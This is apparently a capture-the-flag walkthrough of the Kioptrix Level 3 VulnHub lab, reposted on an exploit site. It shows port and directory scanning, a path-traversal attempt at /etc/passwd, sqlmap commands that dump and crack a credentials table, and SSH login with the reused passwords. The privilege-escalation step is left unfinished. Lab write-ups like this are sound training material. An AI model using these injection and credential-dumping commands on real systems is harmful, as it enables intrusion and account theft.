Share
## https://sploitus.com/exploit?id=06D7C486-CB31-5267-AD12-947E2612ABD2
# Kioptrix: Level 3 โ€” Penetration Testing Writeup

**Target:** Kioptrix Level 3 (VulnHub)
**Attacker IP:** 192.168.56.1 (Kali)
**Target IP:** 192.168.56.102 (`kioptrix3.com`)
**Difficulty:** Beginner/Intermediate
**Attack chain:** Web recon โ†’ directory enumeration โ†’ SQL injection โ†’ credential
cracking โ†’ credential reuse (SSH) โ†’ sudo misconfiguration โ†’ root

---

## Table of Contents
1. [Reconnaissance](#1-reconnaissance)
2. [Web Enumeration](#2-web-enumeration)
3. [Directory Brute-Forcing](#3-directory-brute-forcing)
4. [Discovering the Gallery Application](#4-discovering-the-gallery-application)
5. [SQL Injection](#5-sql-injection)
6. [Extracting & Cracking Credentials](#6-extracting--cracking-credentials)
7. [Admin Panel Access](#7-admin-panel-access)
8. [Gaining a Shell via SSH](#8-gaining-a-shell-via-ssh)
9. [Privilege Escalation](#9-privilege-escalation)
10. [Lessons Learned](#10-lessons-learned)

---

## 1. Reconnaissance

Started with a full TCP port and service-version scan to establish the
attack surface:

```bash
nmap -sV -p- 192.168.56.102
```

![Nmap scan results](images/01-nmap-scan.png)

**Results:**

| Port | Service | Version |
|------|---------|---------|
| 22/tcp | ssh | OpenSSH 4.7p1 Debian 8ubuntu1.2 |
| 80/tcp | http | Apache httpd 2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |

Only two services exposed. Both are old (2008-era) builds โ€” a strong signal
the box is vulnerable to something version-specific rather than a
zero-day-class bug. SSH is available but useless without credentials, so the
web server on port 80 became the primary target.

---

## 2. Web Enumeration

Fetched the homepage manually to see how the site is built:

```bash
curl http://kioptrix3.com
```

![Homepage source](images/02-curl-homepage.png)

The `` tag immediately
identifies the CMS: **LotusCMS**. Also visible in the source: a link to
`index.php?system=Admin`, worth checking next.

```bash
curl http://kioptrix3.com/index.php?system=Admin
```

![Admin login page](images/03-curl-admin-login.png)

This confirms a LotusCMS admin login panel exists at that path. No
credentials yet โ€” noted for later, but not pursued directly since brute
forcing a login form blind is inefficient.

**Testing for Local File Inclusion (LFI):**

```bash
curl "http://kioptrix3.com/index.php?page=../../../etc/passwd"
```

![LFI attempt - failed](images/04-lfi-attempt.png)

Result: a normal "Page Not Found - Error 404" response, not the contents
of `/etc/passwd`. This rules out a raw, unsanitized `page` parameter being
passed into a PHP `include()` โ€” the LFI class of attack does not apply
here (the app is filtering or whitelisting `page` values).

---

## 3. Directory Brute-Forcing

Rather than continuing to guess paths manually, ran a directory
brute-force to enumerate the full site structure:

```bash
gobuster dir -u http://kioptrix3.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
```

![Gobuster results](images/05-gobuster.png)

**Key findings:**

| Path | Status | Notes |
|------|--------|-------|
| `/gallery` | 301 | New application โ€” not linked from the homepage nav |
| `/phpmyadmin` | 301 | Database admin interface |
| `/core`, `/modules`, `/cache`, `/style` | 301/403 | LotusCMS internals |
| `/update.php` | 200 | Worth noting, not pursued |

`/gallery` stood out immediately as a second, separate application bolted
onto the CMS โ€” a common pattern on these boxes, and often the weaker link
compared to the "main" software.

---

## 4. Discovering the Gallery Application

```bash
curl http://kioptrix3.com/gallery/
```

![Gallery homepage](images/06-curl-gallery.png)

The response's `Generator` meta tag reveals this is running **Gallarific**,
a separate, older photo-gallery CMS โ€” a completely different codebase from
LotusCMS, and therefore a completely different set of vulnerabilities to
check.

---

## 5. SQL Injection

Manually tested the gallery's `id` parameter, first with a normal value,
then with a single quote to try to break the underlying SQL query:

```bash
curl "http://kioptrix3.com/gallery/gallery.php?id=1"
```
![gallery.php?id=1 baseline](images/07-gallery-id1.png)

```bash
curl "http://kioptrix3.com/gallery/gallery.php?id=1'"
```
![gallery.php?id=1' test](images/08-gallery-id1-quote.png)

Both requests returned visually identical pages at the HTTP level โ€” no
obvious SQL error was rendered in the HTML. However, this alone doesn't
rule out injection: many injectable parameters don't throw a visible error
and instead require blind or boolean-based techniques to detect. Rather
than conclude a false negative from a single manual test, the parameter
was handed to sqlmap for a much broader set of injection tests:

```bash
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs --batch
```

![sqlmap injection detection](images/09-sqlmap-dbs.png)

**sqlmap confirmed the `id` parameter was injectable via multiple
techniques simultaneously:**
- Boolean-based blind
- Error-based (MySQL โ‰ฅ 4.1, `FLOOR()`/`RAND()` trick)
- (sqlmap's full output also reported time-blind and UNION-based vectors)

This is a strong, highly exploitable injection point despite showing no
visible symptoms to the naked eye โ€” a good practical lesson in why
automated confirmation matters even when a manual test looks clean.

---

## 6. Extracting & Cracking Credentials

With injection confirmed, enumerated the databases, then the tables inside
the `gallery` database:

```bash
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -D gallery --tables --batch
```

![Tables in gallery database](images/10-sqlmap-tables.png)

Seven tables were found. `dev_accounts` stood out as the most likely to
contain real, reusable credentials (as opposed to `gallarific_*` tables,
which are more likely scoped to the gallery app itself):

```bash
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch
```

![Dumped and cracked dev_accounts](images/11-sqlmap-dump-cracked.png)

sqlmap dumped two rows and automatically recognized the `password` column
as MD5 hashes, then cracked both using its bundled dictionary attack:

| Username | Hash | Cracked Password |
|----------|------|-------------------|
| `dreg` | `0d3eccfb887aabd50f243b3f155c0f85` | `Mast3r` |
| `loneferret` | `5badcaf789d3d1d09794d8f021f40f0e` | `starwars` |

These usernames don't look like gallery-app accounts โ€” they look like
**Linux system usernames**, which made them the natural next thing to try
against SSH.

---

## 7. Admin Panel Access

Separately, the `gallarific_users` table (dumped via a similar `--dump`
against that table) yielded a plaintext gallery-admin credential:
`admin : n0t7t1k4`. Used it to authenticate to the Gallarific admin panel:

```bash
curl -X POST "http://kioptrix3.com/gallery/gadmin/index.php?task=signin" \
  -d "username=admin&password=n0t7t1k4" -c cookies.txt -L
```

![Successful admin login](images/12-gadmin-login.png)

The response `document.location.href = "index.php";` is the app's
client-side redirect fired on a successful login โ€” confirmation the
credential is valid. This grants gallery-admin access, but was a secondary
finding; the real path forward was the `dreg`/`loneferret` credentials.

---

## 8. Gaining a Shell via SSH

A direct SSH attempt with the cracked `loneferret` credential initially
failed algorithm negotiation โ€” a mismatch between this ~2009-era box's
legacy OpenSSH offerings and a modern Kali client's stricter defaults:

```
Unable to negotiate with 192.168.56.102 port 22: no matching host key type found.
Their offer: ssh-rsa,ssh-dss
```

Resolved by explicitly re-enabling the legacy algorithms on the client
side for this connection only:

```bash
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group1-sha1 loneferret@192.168.56.102
```

![Successful SSH login as loneferret](images/13-ssh-login.png)

```
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
loneferret@Kioptrix3:~$ whoami
loneferret
```

Confirmed shell access as the `loneferret` system user using the password
recovered via SQL injection โ€” a direct case of database credential reuse
on the OS.

---

## 9. Privilege Escalation

*(To be completed โ€” next step is `sudo -l` as `loneferret`, which reveals
an allowed no-password `sudo` entry for the `ht` binary, a permissive
editor that can be used to modify `/etc/sudoers` or otherwise obtain a root
shell.)*

```bash
sudo -l
```

> **Note:** This section will be filled in once the escalation is
> completed and screenshotted, following the same evidence-first structure
> as above.

---

## 10. Lessons Learned

- **A second, unlinked application (`/gallery`) was the actual entry
  point** โ€” the "main" CMS (LotusCMS) had a known public exploit that
  looked promising on paper, but the real vulnerability was in the smaller,
  bolted-on Gallarific app discovered only through directory
  brute-forcing.
- **A clean-looking response doesn't rule out SQL injection.** The manual
  `'` test showed no visible error, but sqlmap still confirmed multiple
  working injection techniques on the same parameter โ€” automated
  confirmation caught what a quick manual check missed.
- **Credential reuse across trust boundaries is a recurring theme.**
  Database-level credentials (`dreg`/`loneferret`) turned out to be valid
  Linux system accounts, and a separate plaintext admin password reused
  the exact login flow of the gallery app itself.
- **Tooling assumptions can look like target hardening.** The SSH
  algorithm-negotiation failure initially looked like a dead end, but it
  was simply a modern client refusing legacy ciphers by default โ€” solved
  client-side, not a target vulnerability at all.

---